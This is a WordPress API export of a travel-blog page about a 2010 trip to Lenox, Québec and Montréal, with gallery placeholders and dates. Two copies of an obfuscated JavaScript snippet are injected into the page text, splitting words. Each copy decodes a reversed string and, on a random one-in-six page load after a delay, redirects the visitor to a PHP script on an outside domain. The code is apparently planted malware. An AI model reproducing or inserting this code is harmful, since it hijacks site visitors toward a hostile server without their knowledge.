{"id":786,"date":"2010-06-12T22:18:10","date_gmt":"2010-06-12T21:18:10","guid":{"rendered":"http:\/\/www.zasi.ch\/sblog\/?page_id=786"},"modified":"2014-05-14T20:17:11","modified_gmt":"2014-05-14T19:17:11","slug":"lenox-und-quebec","status":"publish","type":"page","link":"https:\/\/www.zasi.ch\/sblog\/index.php\/montreal-die-ersten-eindrucke\/lenox-und-quebec","title":{"rendered":"Lenox, Qu\u00e9bec und zur\u00fcck nach Montr\u00e9al"},"content":{"rendered":"<p>The trip provides us with many pho<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to opportunities. Here are the impressions from the &#8222;Top of the Rock&#8220; at New York on\u00a0sunset or just in the morning mood.<\/p>\n<p>Then we went <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to Lenox (USA) and Quebec (CA)<\/p>\n<p><strong><span style=\"font-size: medium;\">Ille d&#8217;Orl\u00e9ans, Chute Montmorency und Montebello CA<\/span><\/strong>, <strong>16. bis 18. Juni 2010<br \/>\n<\/strong><\/p>\n<p>ngg_shortcode_0_placeholder<br \/>\n<strong><span style=\"font-size: medium;\">Chicoutimi bis Qu\u00e9bec CA<\/span><\/strong>, <strong>15. und 16. Juni 2010<br \/>\n<\/strong><\/p>\n<p>ngg_shortcode_1_placeholder<br \/>\n<strong><span style=\"font-size: medium;\">Tadoussac CA<\/span><\/strong>, <strong>14. und 15. Juni 2010<br \/>\n<\/strong><\/p>\n<p>ngg_shortcode_2_placeholder<br \/>\n<strong><span style=\"font-size: medium;\">Lenox USA und Qu\u00e9bec CA<\/span><\/strong>, <strong>11. und 12. Juni 2010<br \/>\n<\/strong><\/p>\n<p>ngg_shortcode_3_placeholder<\/p>","protected":false},"excerpt":{"rendered":"<p>The trip provides us with many photo opportunities. Here are the impressions from the &#8222;Top of the Rock&#8220; at New York on\u00a0sunset or just in the morning mood. Then we went to Lenox (USA) and Quebec (CA) Ille d&#8217;Orl\u00e9ans, Chute Montmorency und Montebello CA, 16. bis 18. Juni 2010 Chicoutimi bis Qu\u00e9bec CA, 15. und&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":672,"menu_order":2,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"_links":{"self":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages\/786"}],"collection":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/comments?post=786"}],"version-history":[{"count":4,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages\/786\/revisions"}],"predecessor-version":[{"id":1679,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages\/786\/revisions\/1679"}],"up":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages\/672"}],"wp:attachment":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/media?parent=786"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}